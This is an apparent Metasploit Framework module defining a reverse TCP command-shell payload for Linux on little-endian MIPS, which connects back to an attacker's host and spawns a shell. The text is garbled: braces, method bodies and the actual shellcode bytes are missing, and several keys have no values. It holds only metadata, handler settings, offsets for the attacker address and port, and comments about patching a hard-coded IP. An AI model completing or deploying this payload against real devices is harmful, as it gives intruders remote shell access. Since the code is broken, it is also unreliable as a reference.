57 lines
2.6 KiB
57 lines
2.6 KiB
# $Id$
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org)
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Julien Tinnes',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
'Offsets' =>
# FIXME: LHOST does'nt patch anything real, host is fixed to
# Get shellcode with String.cpu=Metasm::MIPS.new
# sc.decode
# (but Metasploit's version is buggy)
# We need to patch this: (C0A80109 =
# lui $t0, -3f58h ; @4ch 3c08c0a8
# ori $a2, $t0, 109h ; @50h 35060109
'LHOST' => [ 0x130, 'ADDR' ],
'LPORT' => [ 0x4C, 'n' ],
'Payload' =>
# FIXME: remove extra 0 bytes!
end |